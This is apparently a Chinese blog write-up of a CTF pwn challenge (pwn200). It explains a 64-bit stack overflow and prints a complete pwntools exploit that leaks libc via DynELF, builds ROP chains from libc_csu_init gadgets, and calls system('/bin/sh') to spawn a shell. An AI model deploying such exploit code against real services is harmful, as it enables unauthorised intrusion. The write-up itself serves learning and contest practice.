0x00:

XCTF开赛了,只看了pwn,这次还比较有意思,有x86  x64  arm mips 多种cpu构架的pwn。自己只搞出了pwn200

0x01:

基本信息:

x64 动态链接 有调试符号(怪不得是最简单的...)

开启的保护如图可以看到。

运行下,随便给点输入:

经过分析,发现问题出在echo()函数

而且这个bof的payload大概的格式:

payload = "A"*24+"BBBBBB"+"\x00\x00"

0x02:

  思路就是 利用构造的ROP链先去 leak 远程服务器上libc里的system地址,然后利用ROP链再次把 "/bin/sh" 和system()地址 写入程序的.bss段,最后再次利用ROP链去执行 system("/bin/sh")

  但是要注意:x64的函数调用 参数传递顺序是 RDI  RSI  RDX  RCX  R8  R9 之后的参数才用栈传递。

  在IDA中看下

  

  我们可以利用 pwntools的 去得到程序中write()read()这些系统调用的got,用来构造ROP。这时候要使用的是 通用型的ropgads,因为源程序中并没有一些辅助性的东西。

在初始化libc的时候,这些指令可以为我们所用来构造ROP,设置好参数。

因为也没有给libc,所以要leak libc中的函数地址,pwntools的dynELF很好用。

0x03:

exp 如下

#!/usr/bin/env python

# coding=utf-8

# author:muhe

# http://www.cnblogs.com/0xmuhe/

from pwn import *

elf = ELF('./pwn200')

p=remote('127.0.0.1',6666)

#p = remote('180.76.178.48',6666)

#p = process('./pwn200')

addr1=0x40089A

addr2=0x400880

main_addr = 0x4007CD

ppppr=0x40089c

bss_addr=0x601078

got_write = elf.got['write']

got_read = elf.got['read']

flag=True

def leak(address):

    global flag

    junk = "A"*24

    p1=""

    p1+=junk

    p1+=p64(ppppr)

    p1+=p64(addr1)

    p1+=p64(0)+p64(1)+p64(got_write)+p64(8)+p64(address)+p64(1)

    p1+=p64(addr2)

    p1+="\x00"*56

    p1+=p64(main_addr)

    p.recvuntil('F\n')

    p.send(p1)

    #raw_input()

    if flag:

        data = p.recv(8)

        flag=False

    else:

        p.recv(0x1b)

        data = p.recv(8)

    print "%#x => %s" % (address, (data or '').encode('hex'))

    return data

d = DynELF(leak, elf=ELF('./pwn200'))

system_addr = d.lookup('system','libc')

print "system_addr=" + hex(system_addr)

#----------------write /bin/sh to .bss-----------------#

junk = "A"*24

payload=""

payload+=junk

payload+=p64(ppppr)

payload+=p64(addr1)

payload+=p64(0)+p64(1)+p64(got_read)+p64(24)+p64(bss_addr)+p64(0)

#    addr_junk_rbx_rbp_r12_r13_r14_r15

#order:RDI  RSI  RDX  RCX  R8  R9

payload+=p64(addr2)

payload+="\x00"*56

payload+=p64(main_addr)

p.recvuntil('F\n')

print "payload 1 ...."

#raw_input()

p.send(payload)

sleep(1)

p.send("AAAABBBB")

p.send("/bin/sh\0")

p.send(p64(system_addr))

#raw_input()

print "sent .."

#raw_input()

sleep(1)

#-----------------get shell --------------------------#

junk = "A"*24

payload2=""

payload2+=junk

payload2+=p64(ppppr)

payload2+=p64(addr1)

payload2+=p64(0)+p64(1)+p64(bss_addr+16)+p64(1)+p64(1)+p64(bss_addr+8)

#    addr_junk_rbx_rbp_r12_r13_r14_r15

#order:RDI  RSI  RDX  RCX  R8  R9

payload2+=p64(addr2)

payload2+="\x00"*56

payload2+=p64(main_addr)

p.recvuntil('F\n')

#raw_input()

print "payload 2 ...."

p.send(payload2)

print "ok get shell"

p.interactive()

  

打了一波本地

后来遇到个问题,exp打本地,或者是socket搭建起来的都可以打,但是远程服务器打不了。 - -#  尴尬

0x04:

  算是学习了一波吧,有收获就是好的。

[RCTF]Pwn200 wp的更多相关文章

  1. 【攻防世界】高手进阶 pwn200 WP

    题目链接 PWN200 题目和JarvisOJ level4很像 检查保护 利用checksec --file pwn200可以看到开启了NX防护 静态反编译结构 Main函数反编译结果如下 int ...

  2. 逆天通用水印支持Winform,WPF,Web,WP,Win10。支持位置选择(9个位置 ==》[X])

    常用技能:http://www.cnblogs.com/dunitian/p/4822808.html#skill 逆天博客:http://dnt.dkil.net 逆天通用水印扩展篇~新增剪贴板系列 ...

  3. wp已死,metro是罪魁祸首!

    1.这篇文章肯定会有类似这样的评论:“我就是喜欢wp,我就是喜欢metro,我就是软粉“等类似的信仰论者发表的评论. 2.2014年我写过一篇文章,windows phone如何才能在中国翻身? 我现 ...

  4. 关于 WP 开发中.xaml 与.xaml.cs 的关系

    今天我们先来看一下在WP8.1开发中最长见到的几个文件之间的关系.比较论证,在看这个问题之前我们简单看看.NET平台其他两个不同的框架: Windows Forms 先看看Window Forms中的 ...

  5. Android,ios,WP三大手机系统对比

    从前,我以为.一个手机系统只是一个系统的UI风格,没什么不同的.然而,在我混合使用这三个手机系统之后,才明白,一个手机系统远不只一个UI那么简单,而真的是可以称之为一个“生态”. 首先祭出三台经典设备 ...

  6. 搜狗输入法wp风格皮肤

    换了个nexus 发现输入法真的没有wp的好用 没办法,刚好搜狗输入法有定制皮肤的选项,所以自己做了个wp风格的输入法皮肤. 一点微小的工作 http://pan.baidu.com/s/1kVsHd ...

  7. 免费获取WP之类的开发者权限或免费使用Azure 2015-10-19

    上一次弄wp真机调试的时候,卡住了,这里讲一下怎么解决(http://www.cnblogs.com/dunitian/p/4870959.html) 进这个网址注册一下:https://www.dr ...

  8. 【WP开发】读写剪贴板

    在WP 8.1中只有Silverlight App支持操作剪贴板的API,Runtime App并不支持.不过,在WP 10中也引入了可以操作剪贴板的API. 顺便说点题外话,有人会说,我8.1的开发 ...

  9. 【WP开发】不同客户端之间传输加密数据

    在上一篇文章中,曾说好本次将提供一个客户端之间传输加密数据的例子.前些天就打算写了,只是因一些人类科技无法预知的事情发生,故拖到今天. 本示例没什么技术含量,也没什么亮点,Bug林立,只不过提供给有需 ...

随机推荐

  1. java第一次实验总结&第三周总结

    Java第一次实验报告,java开发环境与简单的Java程序 一.实验目的 1.熟悉JDK开发环境 2.熟练掌握结构化程序设计方法 二.实验内容 打印输出所有的"水仙花数",所谓& ...

  2. CDH安装前系统优化准备

    参考: https://www.cnblogs.com/yinzhengjie/p/10367447.html https://www.sysit.cn/blog/post/sysit/CDH6.2. ...

  3. PTA(Basic Level)1022.D进制的A+B

    输入两个非负 10 进制整数 A 和 B (≤230−1),输出 A+B 的 D (1<D≤10)进制数. 输入格式: 输入在一行中依次给出 3 个整数 A.B 和 D. 输出格式: 输出 A+ ...

  4. MySQL中关于主从数据库同步延迟的问题解决

    MySQL的主从同步是一个很成熟的架构,优点为:①在从服务器可以执行查询工作(即我们常说的读功能),降低主服务器压力;②在从主服务器进行备份,避免备份期间影响主服务器服务;③当主服务器出现问题时,可以 ...

  5. 关于Windows10内存随时间不断升高问题

    问题描述 电脑买了10个月了,头半年的运行内存都是正常的,基本不会超过60%,但是最近几个月发现自己电脑的运行内存会随时间不断地升高,关机后重启也无法解决这个问题QAQ 常见的症状为一开机,点开任务管 ...

  6. Dedesql数据库类详解(二次开发必备教程)

    其实数据库类织梦之前就有一个介绍,http://help.dedecms.com/v53/archives/functions/db/,这篇文章讲解了数据库类的一些常见的使用方法,不过没有结合例子去介 ...

  7. python网络编程-socket套接字通信循环-粘包问题-struct模块-02

    前置知识 不同计算机程序之间数据的传输 应用程序中的数据都是从程序所在计算机内存中读取的. 内存中的数据是从硬盘读取或者网络传输过来的 不同计算机程序数据传输需要经过七层协议物理连接介质才能到达目标程 ...

  8. docker在mac下安装及配置阿里云镜像加速

    安装 brew cask install docker 配置 关于阿里云加速地址,下面会有详细说明 阿里云官方镜像加速 官方文档:https://help.aliyun.com/document_de ...

  9. 帝国cms 反馈

    <form name='feedback' method='post' enctype='multipart/form-data' action='/e/enews/index.php' ons ...

  10. whistle 前端工具之抓包利器

    一.业务场景 前端本地开发的场景中,我们需要频繁的改动代码,并需要实时看到效果,并且在一些开发场景中,我们需要将特定的请求代理到特定的IP.本地文件等,所以使用fiddler或whistle等本地.真 ...